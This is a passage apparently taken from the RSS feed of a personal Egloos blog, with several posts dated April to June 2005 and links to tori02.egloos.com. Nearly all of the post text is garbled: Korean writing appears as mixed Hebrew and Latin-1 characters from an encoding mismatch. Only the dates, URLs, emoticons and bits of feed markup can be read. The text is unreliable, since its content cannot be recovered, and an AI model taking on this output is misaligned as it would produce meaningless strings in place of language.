    -¼³¸¶ »‎°¢¸¸ ַ°ֱצ.....ְב½ֳµ¿¾ָ ³­ ±׳·¸°װ ³×ֵ¸³­ ¾מְּ¾ר´ֲ ַאµ¿¿¡ ´כַ״ ¸׃¸´¼׃¿¡¼­ ½ֱַ¦¿©÷־ְַ ְַ¹®ְ» ֱ¦±גַֿ°ם ְײ¾תֱצ¸¸..
    -
    -±׳°ַ »ח½ְַּ¿´³× ÷¸´.₪ּ.₪ּ
    -
    -ֱ¡¿רְ÷ ´ח¿¬ָק ´«ְּ ¶ֻ±׳·¡ֱצ¸י¼­ ³מ¶ף ַדµױֱצµױ µµ³ֳק¸¦ ½־ֱב´.
    -¹ת¹ת ¶³¸®´ֲ ¼ױְ¸·־ µ· °ֵ½½·¯ ֱײ°ם..
    -
    -³×´ֲ ¿פ´ֲ¾ף±¼·־ ¾ֶ¹«·¸ֱצµµ ¾ְ÷ֳ´ ְ־»חַֿ°ם ¹ת··¹ת·· ¶´ֲ °¡½¿ְ» ¾ָ°ם °¡°װ¿¡¼­ ³×¿װ´.
    -
    -ֱ‎¿¡¿ֽ¼­ ³²ֶם¿¡°װ ±׳ »ףָ²ְ» °ם´כ·־ ְחַצַ״¼­ ÷¸¿©ֱב´ץ´ֿ ¿פ´ְ¶ף ֱ₪½ְֵּ ¾ר´. ְּ°ַ ¿פְ» ְְּֿ ¾ֶ´ֿ¶ף °ֱֶ₪ַ״¾ ַׂ ְְֿ־°ֵ °°ְ÷µנ -_-;;; ֱצ± ְּ±ְ» »‎°¢ַֿ¸ח ±׳¶§¸¦ »‎°¢ַֿ´ֿ ¶ַ ¾ף±¼ְּ ָ­²צ °ֵ¸®¸ח ±׳¶§ ±׳ֱ‎¿¡¼­ ¾ֻ¹ַֿ´ר ֳׁ°¢¿¡°װ ¹ּ¾ַָׁ ¸¾ »׃ְּ´. ^^;;;;;
    - ]]> - - ¿ה·±ְת·± ¾±ג - Tue, 28 Jun 2005 11:18:16 GMT - - - <![CDATA[ ¼­¿ן°¡¿ה ]]> - http://tori02.egloos.com/1045301 - - ¿ְ´ֳ ֶק½÷ֳֶ ַׂ°װ »‎°¢ ³µ´ֲµ¥ ±׳¸²±׳¸®°ם ±¿ֳ¸®°ם ַׂ½ֳ°£ְּ ¾ר±÷¿ה~
    -°©ְ±ג ¼­¿ן¿¡ ¿ֳ¶ף°¡ ÷ֱ¾ ַׂ ְְּֿ »‎°ו¾מ¿ה.
    -¿ְ´ֳ ¿ֳ¶ף°¡¼­ ³»ְְּֿ³× ¸נ·¹ ³»·ֱ¿ֳ ¿¹ֱ₪ְװ´ֿ´.
    -÷¼ְְֿ÷ ¿ְ´ְֳת³ב¿¡ °¡¼­ ³¡³×±ה ַ״¿ה..³»ְְֿ÷ ¼רְָק ֱ» ³מ¾ֶ÷¼·ֱ´ֲ ...-_-;;
    -±µ¥ ֶעְְּֿ¶ף ³מ¾ֱֶ ִ£±¸°¡ ְײְ¸·ֱ³× ¸נ¸£°³׳..--;;
    -
    -¾ֶ¹«ֶ° °¬´¿ֽ¼­ ÷ֱֻׂ^^ - ]]> -
    - ְּ±·ח ֱײְ־ְו ֵה¸® - Thu, 23 Jun 2005 04:12:51 GMT -
    - - <![CDATA[ ¸׃¸® ¸»·ֱֱײ´ֲ ³²ְ ]]> - http://tori02.egloos.com/1040062 - - ¾ֶ±מ ¾ףַֽ ÷» ְ־ֵֽ³ ¼׃ ±ג»ח¿¡¼­
    -¾מ¶² ³²ְ°¡ ¹ֱֲק÷סµנ¿ְ¸¦ ֳװ¿µַֿ¸ח ¿©ְְַ ¸׃¸®¸¦ ¸»·ֱֱײ´ֲ ְו¸יְ» ֲן¾ת´°ם ַֿ´ֲ °ְֽ» ְ׀¾ת´.
    -¾ףַֽ ְ׀¾מ¼­ ´½ֳ ±׳ ±ג»ח ֳ£ְ¸·ֱ ÷¸´ֿ ¹«¼צַׁ ´¸¥±ג»ח¿¡ ִֶ¹¯ַפ ¸רֳ£°³׳..--;
    -
    -¿¬¿¹°ט¿¡ ÷° °½ְֹּ ¾ר´ֲ ³×·־¼­´ֲ ¼ײֱקָק ±׳³²ְ°¡ ´©±÷ֱצ ְ ¸נ¸£°´₪ּ.₪ּ
    -¹ֱֲק÷סµנ¿ְ¸¦ ֲן¾ת´´ֿ °¡¼צְּ·ֱ³×..?-_-;;
    -
    -±׳ ¹ֲ÷ס ¾ָ¿¡¼­ ¸׃¸® ¸»¸²ְ» ´חַֿ´ֲ ¿©ְ´ֲ ±ה »‎¸׃¸®ְַ ¼ְׂ¯ְ¶ץ´.
    -¿¹»¿©ְְַ ±ז°ם ְ±±ג³×´ֲ »‎¸׃¸®¸¦ ¸ֱצ°װ »‎±ה ³²ְ°¡ µו¶ףְּ¾מ·־ »ח¶½÷·± ´«±ז·־ ֳִ´÷¸¸ח ¸»·ֱֱ ±׳ ְו¸יְּ ´«¾ױ¿¡ ±׳·ֱֱר´. ¹¹..¹ֲ÷ס´ֿ±מ ְװְ¸·־´ֲ ³כ·¡¸¦ ¾ְֶ¸¾ֶ~÷־¸£°ם ְײְ» ¼צµµ ְײ°ם, ָ­¸י¿£ ¾ָ³×¿ְ°ֱצ¸¸ ¿·¿£ ¿©·¯´כְַ ¼±ַ³±ג·־ ¸׃¸®³¯¸² ָ¿°ת¸¦ ±״´כָ­ ֱַׂצµµ ¸נ¸£°´. ^^;
    -
    -¾ֶ¹«ֶ°..ְּ·¸°װ »ף»ף¸¸ ַ״µµ ¸ֱו~ ְְּו¸י!!
    -
    -¿ל¸®ֱ‎¿¡¼­µµ ְֿ¾מ³×´ֲ ְְּֿ´..¿עָ­ָ­ -_-;;;;
    -¹¹..ֲֹ² ֶ²¸°°װ ְײ´¸י ³­ ְּ»°ם ±ה»‎¸׃¸®ְַ ¼ְׂ¯ְ°¡ ¾ֶ´ֿ¶ף´ֲ°ֽ??
    -
    -±׳·¸´ד ¾מ¶² ֶַם?
    -¾מ±ת¸¸ֵ­ ´ך´ֲ ¾א°£ ¿‏ְּ÷ך°¡ µי¾מ°£ ¸׃¸®·־¼­ ְּ»°װ ְ µו¶ףְַּֿ°ם ³×°¡¸י..
    -

    -±׳·¸´.. ¾ֶ°¡¾¾~ָ₪ְ÷ ַ׀»‎~!! ¹¹ ְּ·¸°װ ֶע°¡µַ°ם^^;;
    -µו¶ףְּ ¾מ¼³ֱַ°װ ַ״¼­ ¹ ְ¿¬ָק ¸»¸°»ףֲֵ·־ ³×°¡°װ µַ¸י..
    -

    -¾ֱֶ¸¶´ֲ ±׳·¡µµ ±¦ֲת´.. ֱרֲ¥ ¾ֱֶ¸¶´ֿ±מ~ ±׳·±µ¥ ³»°¡ ÷¸±ג¿¡ ¾מֲ¿¶© ¾ְֶת¾¾°°ְ»¶§µµ ְײ´ֲ°װ ´ץ ¹®ֱ¦´!-_-;;
    -ַֿ¿©°£ ¾מֱ₪ֲִַׁ ְּ¸׃¸®~ ְ ¸»·ֱ¾ ַֿ´ֲµ¥....
    -
    -³²ֶםְּ ְײְ»¶§ ¸׃¸± °¨°ם ¾ױ¿¡¼­ µו¶ףְּ±ג·־ ¸׃¸± ¸»¸®°ם ְײ³כ¶ף¸י ³²ֶםְ÷ ²ְ ³×¿¡°װ ¹¯´ֲ´.
    -
    -³²ֶם:'³»°¡ ¸»·ֱֱ±מ?'
    -
    -ֳ·¿¡ ְּ ¸»ְ» µי¾תְ»¶©..
    -¾ֶ´ֿ...ְּ°װ ְ¢ ָ¾ְח³ִ...!!
    -¸׃¸® ֵ׀°ם ¸»¸®´ֲ°װ ¾ף¸¶³× ±ֲֽתְ÷ ְְֿ־µ¥..ָוָו
    -
    -ֵה¸®: ±׳·¡±׳·¡~~^^
    -
    -¾ֹ¾ְֶײ´ר ָ­ְו´כ ְְַ¿¡¼­ ³»·ֱ¿ֽ¼­ ָ­ְו´כְְַ¿¡ ±ג´כ°ם ¹´¿¡ ¾ְֹ÷³×¿ֽ ִ§´כ¿¡ ¾ֹ¾ֶ¼­ ¸׃¸®¸¦ ¸»·ֱֱײ´ֲ ³²ֶםְַ ¸נ½ְְ» ַׁ¹ר »ף»ףַ״ ÷¸½ֳ¶ף~
    -±׳¾ף¸¶³× ·־¸¸ֶ½....
    -ֱ₪¸» ·־¸¸ֶ½ַׁ°¡?-_-+
    -
    -ְ§ְְּ׳...µו¶ףְּ±ג°¡ µ¹¾ֶ°¡´ֲ ¼ׂ¸®¿ֽ ַװ²²
    -³²ֶםְ÷ ³×ְַ ¸׃¸®¸¦ ְ ֵ׀¾מ°¡¸ח ¸»¸®±ג ½ְֳַׁ´.
    -ְּ·¸°װ~
    -

    -ְ½...
    -°­¾ֱֶצ°¡ µָ ±ג÷׀¿¡ ²¿¸®¶ףµµ ָחµי¾מ ÷¼±מ? ֱַצ¸¸..²¿¸®°¡ ¾ר³׳..
    -
    -¹¹µח ¿­½ָֹק ַֿ´ֲ ¿ל¸®³²ֶם!
    -ַא¿©³× ÷ףֶ´»ץ ¸¶¸£ֱצ ¾ְ÷ ÷־÷׀ ְײְ»±מ..±¸¼®±¸¼® ְ µיֳח°¡¸ח ¸»·ֱֱ״´.
    -ְּ·±±ג¼¼·־ ¸»¸®´°£ ¸׃¸®¿¡ °¡¹³µיֱצ ¾ְ»±מ..¶ף°ם °ֱֶ₪ַֿ°ם ְײ´ֲµ¥ µו¶ףְּ±ג ¼ׂ¸®°¡ ¸״ֳב´.
    -
    -¾ֲֶק..
    -¸׃¸®°¡ ֱ¶± ´ת ¸»¶תְ»¶§ ¾ְָ¸·־ ¸׃¸®¸¦ ֱ¶± ¸»¾ֱֶא¾ ַֿ´ֲµ¥..
    -ְּ¹ּ ´ְ÷°ֵ °°´.
    -

    -÷רְ·ח÷¸´ ´ץ »»»»ַ״ֱ® ¿ְֿ °ֱַ¶»ףֲֵ·־ »ח¹זֶָ¹ז »¸¾מ¹צ¸° ¸׃¸®¶ף´ֿ!
    -
    -ָל³ִ..±׳·¡µµ ³×¿¡°װ ְֱֱ÷ְֿ ַ´°ם ½ּ±÷¡± ַֿ°ם ְײ´ֲ ³²ֶם¿¡°װ
    -
    -'ְּ°װ ¹¹¾!!!'(¹צ·°)ָ­ ³¾¼צµµ ¾ר´ְְֲּֿ°ם..
    -'°ם¸¶¿צ^^' ¶ף°ם ¾ך±גַֿ¸ח ½½¸ח½ֳ ¸ס¿וֱֵ °¡¼­ ¸׃¸®¿¡ ֱ¶± ¹° ¹¯ָק°ם ³×¿ְ´ֲ ¼צ ¹¿¡.
    -
    -ְֱּ¨ ¿״¸¸ַ״¼± ³²ֶםְּ ¸׃¸® ¸»·ֱֱ״´°ם ¾ך±גַ״µµ ְ °ְֵ‎ַֿ°ם ְײ´ֲ ֶַםְּ´.
    -¹¹..¾ױְ¸·־ ±ה »‎¸׃¸®¸¦ °¡ֱצ°װ µַ¾מ ָ₪¿© ¾ֶ¹«·¸°װ³× ¸»·ֱµµ ±׳³ֹ ְ¯ֱצµַ´ֲ ¸׃¸®¸¦ °¡ֱצ°װ µָ´¸י ´½ֳ ¸»·ֱֱײ°´´ֲ ֱ¦ְַ¸¦ ¼צ¶פַֿ°װ µֱֹצµµ ¸נ¸¥´.
    -
    -¾ֶ³ִ... ³²ֶם¿¡°װ ¾ֶ¿¹ µו¶ףְּ½ֳ ¸׃¸® ¾ְָ¸·־ ²¿÷ִׂ¡±ג ±ג¼תְ» ְ¼צַ״ ÷ֱ??? *_*
    - - ]]> -
    - ¿ה·±ְת·± ¾±ג - Sat, 18 Jun 2005 07:02:53 GMT -
    - - <![CDATA[ ֱד!ֱד!ֱד! ]]> - http://tori02.egloos.com/1036147 - - ¿ה»ק ¸׃¸®¿¡ ³לְּ ¾´ ±ג÷׀ְּ´.
    -ֲ±ֲ±ַׁ ³תְַ ֱײ¸§ »חְּ»חְּ ±ג¸§ִ¥ְּ¶ףµµ ַ״¾ַׂ±מ÷¸´.
    -ַׁµ¿¾ָ ±¾²±ג ¼¼°ט¿ֽ ¸ײ¾מֱ³´ץ´ֿ ¾מ¶»°װ ±ְ» ½ט¾ת´ֱֲצ ֱ¶ֲק °¨µµ ְ ¾ְָגָק°ם..
    -¸׃¸´¼׃¿¡ ֵ׀ְּ ³­ ±ג÷׀ְּ´.
    -
    -±׳·¡..ְּ°ַ ֱדֵ¿ְּ´.
    -
    -ֱד..
    -
    -ֱד??
    -
    -¾ף¸¶ְ ³»°¡ ֱ¸°זַ״ ¸¶ֱצ¾´ֲ ¼±±³»ח´װ²²¼­ ±׳¸² ¸מְוְ» ÷־ֵ¹ַֿ¼ּ´.
    -±¹ֱ¦¿µ¾מ±³»ח ְ°ֱץְ» µ´ֲµ¥ ְײ¾מ ¸¶ֱצ¸·´°טְַ ½ֳַטְּ ְײ´ֲµ¥ , °ֵ±ג¿¡ ַ¿הַׁ ±׳¸²ְּ¶ץ´.
    -¿µ¾מ·־ ¾ְֶּµי¿¡°װ ±׳¸²ְ» ÷¸¿©ֱײ¸ח µ¿ָ­³»¿כְ» µי·ֱֱײ´ֲ °ְּֽ´.
    -±׳·ֱ¾ ַׂ µ¿ָ­´ֲ 'ַַ¸®÷־´ֲ »ח³×ְּ' ¿´´!
    -
    -¾מָז... ±׳ µ¿ָ­´ֲ ֱד°¡ ¶¼°ֱֵצ·־ µמְוַֿ´ֲ ¹«½ֳ¹«½ֳַׁ µ¿ָ­°¡ ¾ֶ´ֿ´ר°¡!!!
    -±׳°ֽµµ µיֱדµי!
    -
    -½ֳ°£µµ ÷°·־ ¾ר°ם, ַׁ¹ר ÷¸¿©ֱײ°ם ¸¶´ֲ ±׳¸²ְּ¶ף ֱד¸¦ ¸מ¸¶¸® ±׳¸®°ם ÷¹»חַֿ±ג·־ °בֱ₪^₪·^V
    -ֱ¶± ´¸¥ְֲֵַַ ֱדµיְ» ¸מ¸¶¸® ±׳¸®°ם ¿©±גְת±ג »ׁ¸®±ג ½ְֳַ´.
    -
    -ֱד¶«¿¡ °ם¹־ַֿ´ֲ ¸¶ְ» »ח¶קµי, ַַ¸®¼ׂ¸®¿¡ ¿©±גְת±ג¼­ ³×¿ְ´ֲ ֱדµי, ֱ¼­¼­ °¡´°¡ °­ְ¸·־ ÷ֱצ´ֲ ֱדµי~~
    -±׳·¸°װ ֱד¸¦ ¿©±גְת±ג »ׁ¸®°ם, ¹זַג¹²°ם, ְֱּ°ם ַ´ץ´ֿ
    -ֱ₪¸» ³×ֱ¿£ ֱד³¿»ץ°¡ ³×´ֲµםַׁ ֲר°¢¿¡ ÷ֱ³°ם ¼׃µµ ÷°·־ ¾ֱֱָ¾ֶ ֱצ´ֲµם..²ץ~
    -
    -ַֿ¿©°£ ְּ·¸°װ ְת·¸°װ ±«·־¿מ ְ¾קְ» ¸¶ִ¡°װ µַ¾ת´.
    -
    -÷¸¥½ֳ°£³»¿¡ ¿ֿ¼÷ַֿ´ְ¶ף ֶקֵה¼¥ְ¸·־ »ׁ·ֱ´ע´ץ´ֿ ´ְ³¢ַׁ ֱד¿¡ ´ְ³¢ַׁ »צ°¨ְּ´..¿׳..
    -±׳·¡µµ ֱ¸°זַֿ°ם ֱֱ¾ֶַֿ´ֲ ÷׀ְַ ְְֿ» µµ¿ֽµו·ֱ¼­ »ׁµםַֿ´!^^
    -

    -´ְ½¿¡ ½ֳ°£ְ ¿©ְ¯°¡ µַ°ם ֳ¥ְ¸·־ ³×¿ֳ ±׳¸²ְּ µָ´¸י ְּ·± ¸¸ָ­½÷ֵ¸ְֿ,´ְ³¢ֶק¼¥ְּ ¾ֶ´ׁ ָ¸ָ­ ½÷ֵ¸ְֿ·־ ַ¥ַצַ״÷¸°ם ½ֽ´!
    - - ]]> -
    - ְֿ·¯½÷ֶ®·¹ְּ¼ַ - Tue, 14 Jun 2005 12:36:23 GMT -
    - - <![CDATA[ ְת¹רֱײ¿£.. ]]> - http://tori02.egloos.com/1036119 - - ¾ֶ..ְּ·¸°װ ±¿ֳ¸®±ג°¡ ¾מ·ֱ¿מ ְְֿֿ ְֱּ¾!! ₪ּ.₪ּ
    -µµ´כֳ¼ ַֿ·ח¿¡ ַֿ³×¾¿ ָ₪ְ÷ µ־°³¾¿ ¿ֳ·ָ¾ת´רְְּ ¾נֱ¦¿´´ֱֲצµµ ±מ¸¶µזַֿ´.
    -ַֿ·חַֿ·ח°¡ ¿ײְִֹּ »¡¸® ֱצ³×°¡°ם µµ´כֳ¼ ִִֵֽ¾ױ¿¡ ¾ֹ¾ְֶײ¾מµµ ¸׃¸´¼׃ ¾ך±ג ²¨³»±ג°¡ ¿ײְִֹּ ¾מ·ֱ¿מֱצ..
    -
    -ְת¹רֱײ´ֲ ְֿ³¡³»³ץ°ם ִ´ֵֽ½÷ְַ °בָ¥½ְִ» ´³א¿װ´.
    -ִ´ֵֽ½÷´ֲ ±׳¾¸»·־ ´¾ֶַֿ°ם ¾ֶ¸§´ה°ם °ם¿מ ½ֵ÷־¿´´!
    -³» ¾מ¼³ֲַ ±׳¸²ְ¸·־ ַ¥ַצְַֿ´ֿ(2µמ½ֵ ¸ם¶ֳ¼^^) ִ´ֵֽ½÷¿¡°װ ´©¸¦ ³¢ִ¡´ֲ °ֵ °°¾ֶ ±׳³ֹ ְּ·¸°װ¸¸ ַ¥ַצַׂ¶ץ´^^
    -
    -½ֵ¶µµ ¸ְײ¾ת°ם, ַֿ°´µיµµ ¸¹¾ׂ°ם, ְ½½ִµµ ¸ְְײ¾ת°ם~!
    -
    -¹«¾ש÷¸´ ְּ±·ח¿¡¼­ »חֱרַׁ¹ר ÷ֱֳצ¸¸ ¹«ֳ´ְּ³× ִ£±ַׁ ְּµיְ» ¸¸³¯¼צ ְײ¾ת´!
    -ַַ½¬´װ,ֱצ¿¬´װ, ְ¯´ֿ!
    -´µי »חֱר¿¡¼­¿ֽ ¶ָ°°ְ÷ ¸נ½ְְּ¶ף ½±°װ ¾ֻ¾ֶ÷¼ ¼צְײ¾ת´^^
    -
    -ַַ½¬´װְַ ֵ«´«°ת ´¾ֶַׁ »‎¸׃¸®~ ֱצ¿¬´װְַ »‎±°ֵ¸®´ֲ ¹ּ¼ׂ~ ְ¯´ְַֿ µ¿±׳¶‏°ם ִ¿´¶ץ ´«!±׳¸®°ם ֱצ¿¬´װ µ‏ ¿¹¿רְּ~ ְ´ֲ¸נ½ְ¸¸ ÷ֱ¾ ֱַצ¸¸..»חֱר°ת ¶ָ°°ְ÷ ±ֽ¿©¿מ ¸נ½ְְּ´^₪·^
    -
    -½ֳ°£ְּ ´µי ³ֻ³ִֻ¡¾¾ֶ ¸¹ְ÷ ¾ך±ג ³×´©ֱצ ¸רַ״ ¾ֶ½¬¿ֱצ¸¸ ±ג÷׀ְֱֱ÷ ¸¸³² ְּ¿´´°ם³× ַׂ±מ?
    -
    -ְֱּ¦ ְּ±·ח¿¡¼­ ְֱײ ÷ֶ¾ ֵַׂµ¥^^;;
    -
    -±׳³×ְת³× ִ´ֵֽ½÷´ֲ ֱצ±ֲכ ¹¸®¿¡¼­ ³¹«³¹« ¸ֱר ֳ¾ןְ» ¸¸µי°ם ְײ°ֱצ? - ]]> -
    - ְּ±·ח ֱײְ־ְו ֵה¸® - Tue, 14 Jun 2005 12:07:25 GMT -
    - - <![CDATA[ ±׳°£ ְײ¾ת´רְֿ ]]> - http://tori02.egloos.com/1024451 - - ֶק½÷ְֳֶּ ¶הַֿ´°¡ ¶ְ½ ..¶ְ¸ְ½..¶ְ¸ְ¸ְ¸ְ½ ַֿ´ץ´ֿ ַׁµ־´µµ ¸· °ַ³¶´ֲ±÷¿ה -_-;;
    -
    -ְּ±·ח¿¡ ±ְּ ¾ָ ¿ֳ¶ף°¡´ֿ ִ£±¸µי »׃ ¾ֶ´ֿ¶ף ½ֱֹצ¾מ °¡ֱ·µיµµ °ֱֶ₪ְ» ַֿ³׳¿ה^^;;
    -
    -ְּ±·ח¸¦ ¸ײ¸®ַ´ר ¸מ°¡ֱצ ÷° ְְּֿ ְײ¾ת½ְ´ֿ´.
    -
    -ְּ»חַֿ°ם ֳ·¿¡ ְ־ֵֽ³ ¿¬°בְּ ֱ» ¸»½יְּ ְײ¾מ¼­ ְּ»חְַֿ¸¶ְְַ ֶק½÷ְֳֶ» ³ץֳֶ±¸¿ה..
    -
    -±׳´ד¿¡ ¹·־ ½ֵ°ז¼÷+°ת·־ְַ ¿©ְִֶ־ֱצ ְוְּ ֵ»ֳדְ» »¸®¸®~~ ֳ´ץ¸¸ ָ­ְו½ַ µי¶פ³¯¶פ ¾ף¸¶°£ °ם»‎ַ±¸¿ה..
    -
    -ְּ·¯ְת·¯ 5¿ש´ ַא»ח¸¦ ֳ¬±ג´÷¸´ֿ 5¿שְּ ֱצ³×°¡³×÷¸´..±׳·¯±¸ ְײ´ֲµ¥ ´תְִ~
    -
    -³²ֶםְּ ְְ°ֵֵ¸°ם °¡´°¡ °ס¸ס¿¡¼­ ³×¿ְ´ֲ ְµ¿ֲק¿ֽ ÷־µתַפ¼­ ÷״ ³¯¾ֶ¹צ¸° »ח°ְַּ ֱֵֽ³ֱצ ¹¼´ֿ±מ!
    -
    -÷־¿ץ~³¯¾ֶ¼­ ִם´ח~ ¶³¾מֱ®¼­ ±גְ‎±מֱצ ֱַצ¸¸ ´ַאָק ¾ֶ¹«°קµµ ְּ»ף¾ר¾מ¼­ ¿­ָך¸¸¿¡ ֵנ¿רְ» ַֿ°װµָ°ְּֽ ¹·־ ¾מֱ¦±מֱצ ¹ת¾מֱר ְְֿװֱׂ.
    -
    -119¿¡ ½ַ·ֱ°¬´´ֲ ְָ­¸¦ ¹°ם ַֿ´ְֳּ ³כ·¡ֱ³´ֲµ¥ ְְ±½ַ¿¡ °¡¼­ ÷¸´ֿ ´« ¸»¶ֻ¸»¶ֻ ¶°ם ´©¿צְײ´ץ¶ף±¸¿ה!
    -
    -ֶַׁםְ¸·׀ ´ַאְּ¶ף ¿©°ֱצ¸י¼­µµ ֵ« »ח°ם¸¦ ´חַ´ֲµ¥µµ °ְׁ¸·־ ³¹« ¸ײֲִַֿ´ֿ ´ץ °ֱֶ₪ְּ µַ´ץ¶ף±¸¿ה.
    -
    -¾ָ¿¡ ¹¹ ¹®ֱ¦ ְײ´ֲ°ֵ ¾ֶ´ׁ°¡ ַ״¼­¿ה.
    -
    -¸׃¸®»חֱרµµ ֲן¾מ÷¸°ם ַד¸®µµ ֲן¾מ÷¸°ם.. ¾ֶ¹« ְּ»ף¾ר´ץ¶ף±¸¿ה~ ¾מֲמ³× °¨»חַֿ´רֱצ..^^
    -
    -±׳·¡µµ ְִָ¯ֱץ »‎±ז±מ÷ֱ ְװ¿רַ״ ְײְ¸¸י¼­ ¹°¸®ִ¡·ב ¹°ם ¸¹ְּ ³×¾ֱֶ®¼­ ³×¿װ½ְ´ֿ´. ¾ױְ¸·־ ֵכ¿רִ¡·ב ¹±ג·־ַֿ±¸¿ה.
    -
    -»ץ»ן °ַ°­ַֿ°װ °ֹ¾מ´´ֿ°ם, ¸»ַׂ ¼צ ְײ´´ֲ »ח½ַ¿¡ ´כַ״¼­ ³¹« °¨»חַ´ר ½ֳ°£ְּ¿´¾מ¿ה.
    -
    -»ל¸י¼­ ´ֳ ְֱֱ÷ְֿ¸¸ ְײְ» ¼ר ¾רֱצ¸¸, ְּ·¸°װ »ח°ם ´חַ´ר°װ ²ְ ³×» ½ֳ°£ְ÷ ¾ֶ´ֿ¿´½ְ´ֿ´.
    -
    -´צ÷׀¿¡ ¼°¡»°װ ´·ֱ¿װ´ר ½ֳ°£ְ» ֱ» µַµ¹¾ֶ÷¸¸ח ½¯ ¼צ ְײ´ֲ ½ֳ°£µµ µַ¾ת°ם, °ַ°­ְַ ¼ֱַׂװµµ ±ת´°װ µַ¾ת±¸¿ה ^^;
    -
    -±׳³×ְת³×.. ְּ±·ח¿¡ ¿ְ·§¸¸¿¡ ¿ֽ÷¸´ֿ ¿©ְָק ¹ז¹®ַ״ֱײ½ֳ°ם °ֱֶ₪ַ״ֱײ½ֳ´ֲ ÷׀ְּ ¸¹³׳¿ה~
    -
    -±׳÷׀µי²² °¨»חµו¸³´ֿ´^^
    -
    -÷´¿ר¿¡ ¿װ´°¬´ ַֿ´ְ¶ף ַׁµ¿¾ָ ְְֿ» ¾ַָ´ץ´ֿ ְֿµµ ¹׀·ְֱײ°ם ¶ַ ֱַׁײ ¾ָ÷¸ְּ´ץ¶ףµµ ְַּ״µµ ַ״ֱײ½ֳ°ם^^
    -
    -ֱ¶¸¸°£ ְח¹ױ´ֲ ¼ְׂח ְײְ¸¸י ¶ַ ¿ֳ¸±°װ¿ה~~
    -
    -±׳·³ °ַ°­ַֿ½ֳ°ם!ֲקֱ¶½ֹ »ח¶קֱ¶½ֹ ַױ½ֳ´!!! - ]]> -
    - ¹ּ÷׀·ש - Fri, 3 Jun 2005 09:45:28 GMT -
    - - <![CDATA[ »ל»ל ´·ן ֱײ¼¼¿ה! ]]> - http://tori02.egloos.com/960668 - - "¾ש...ְֱּ¦ ¾ֶ·§´ֿ°¡ ָחµי°ֵ¸®´ֲ°ֵ °°¾ֶ!"
    -
    -"³­ ¹ת½ב ¼¼°¹ֲ° ÷ֱ³´ֲ°ֹ?"
    -
    -"¸ס¿ו½ֳֵ³¶§ ¾ף¸¶³× ³» ֶ״°ֳִ ´כ´ֱֲצ ְּ °£¼צַֿ´ְ¶ף ֱ₪¸» ֱר¶¡ְּ¶ף±¸!"
    -
    -"¿ל¸®°¡ ¸»¾ ְּ°¡ ÷ֱ³´°ם ´½ֳ ³×´ֲ°ֽµµ ¾ֶ´ֿ°ם.. ְּ ³×ְּ¿¡ ְּ·¸°װ ָהַׁ ¸פ°ס·־ »ל¾ֶ°¡¾ ַֿ´´ֿ~"
    -
    -±ֳ½ֳ·· ±ֳ½ֳ··~
    -
    -ֲשְוְ» ¿­ְ ÷ׂ¸¸¼¯ְ־ ¸ס¼ׂ¸®°¡ ֱֵֽ®³×¿װ´.
    -
    -
    -

    -
    -ְּ°¡ ÷ֱר ±׳¸©µיְּ ¼÷³­ ¾ף±¼ְ» ַֿ¸ח ֲשְוְ» ¿¬ ³×¸¦ ³כ·ֱ÷»´.
    -
    -±׳...±׳·¸°װ ֳִ´÷¸´ֿ ¸¾ְּ ¶²ַֿ´!
    -
    -±׳·¸±ה ֱַֿצ¸¸..
    -
    -³»°¡ ³ָס¿¡°װ ֶ²´ֿ¸¦ ַ״ֱײ·× ~÷ֱר°קְ» ±ְ¸·־ ¸ֵ²·×~!
    -
    -³ָס ÷ֱר ְּµיְ» ±³ֶָ»ן¾ֶ ³» ¾ױְ¸·־ ָ₪½ֳ »ץ±׳¸©ְ¸·־ »ל¸² »ך´¸י ֱ¶½ַֹֿµµ·ֿ ³כ·ֲַֿ¸¶.
    -
    -³» ¼ױµµ ÷£¾מ°¡¸ח »ח´ֲ ¸¶´ח¿¡ ³ָס ְּ¶ף°ם ¿ְֲ ַׂ½מ³ִ! -_- +

    -
    -
    -³¾¸נ·¹ ְּ»ח¸¦ °¡°װ µַ¾ת½ְ´ֿ´.(ֱצ±»ח´ֲ °ק¿¡¼­ 10÷׀°ֵ¸® ^^ V)
    -
    -ְּ»ח¸¦ °£´°ם »ץ»ל¸²ְ» ¸¶·ֳַֿ´ֲ °ְֽ÷ ¾ֶ´ֱֿצ¸¸, ±׳µ¿¾ָ »ל¾ׂ´ר »ל¸²ְ» ÷¸ְ´ֿ
    -
    -±׳¸©÷־ֵֽ ³´ת³´ת..ְֲ¸·־ °ִֵ¥°װ »ל¸²ַ±¸³×..¶ף´ֲ »‎°¢ְּ µי¾ת½ְ´ֿ´.
    -
    -´ת··ְּ°¡ ְּ·¸°װ ±ת´¾ׂ´°ם ַֿ·ח¾ִֶ§¿¡ ¾הְ²ִ²ְִּ·־ ¹²נ¸®´ֲ ¸¸¹«ַֿ°ם,
    -
    -ְּ÷ֱר ±׳¸©µיְּ ´´ֿ´ֲ ִ¡°ת°¡ ְײ´´ֲ ¾ך±גµµ µיְ÷ ְֿ ¾ר°ם..
    -
    -±׳³ֹ ±׳¸©µי ÷ׂ¸¸ µי¾מ°¡¸ח »ל¾ֶ¾ °ֱׂ?^^
    - ]]> -
    - ¹ּ÷׀·ש - Thu, 7 Apr 2005 05:20:30 GMT -
    - - <![CDATA[ ¾ׁ ֳ¿צ~ ]]> - http://tori02.egloos.com/945331 - - ¾ָ³חµיַֿ¼¼¿ה!
    -
    -¿©ְָק ֳ¿מ³¯¾¾¿¡ ½ה··ַׁ ְּ¾±ג¸¸ ¿ֳ¸®°ם, ¶ַ ½ה··ַֿ°װ °ט¼׃ ÷ס¿צµ־´ֲ °ֽ °°¾ֶ ֲ ֱֻ¼ַֿ³׳¿ה^^;;
    -
    -3¿ש¸»±מֱצ ³¡³»¾ ַׂ ְְַֿ ÷׀·®ְּ »ך´ץ¹ּ¶ף ֱצ± ¸¹ְּ ÷׀ֱײַ״¼­ ÷ם·־±׳ֱתְ» ְב½ֳ ½¬°ם ְײ´ה´ֿ´!
    -
    -±׳·³ ´µי °ַ°­ַֿ½ֳ°ם..ֱ¦°¡ ְ ¾ָ³×ֵ¸³×°ם ְײ´°ם ³ׁ °ֱֶ₪ַֿ½ֱֳצ ¸¶½ֳ±¸¿ה^^ ;
    -
    -°ֶ..°ֱֶ₪ ¾ַָֿ½ֵ´±¸¿ה? -_-;;;;;
    -
    -±׳..±׳·³..
    -
    -ְֿ³¡³­ִָ¿¡ »ל¾ֶ¼­ ÷ֹ°װ¿ה~~^^
    -
    -

    -¿ה ±׳¸²ְ÷ ³«¼­ֶַ¿¡¼­ ¸ַֿ°װ ±׳·ֱ÷» ±׳¸²ְװ´ֿ´~ ְּ°ֵ ±׳¸±¶§°¡..3¿שֳ ¿´³×?
    -
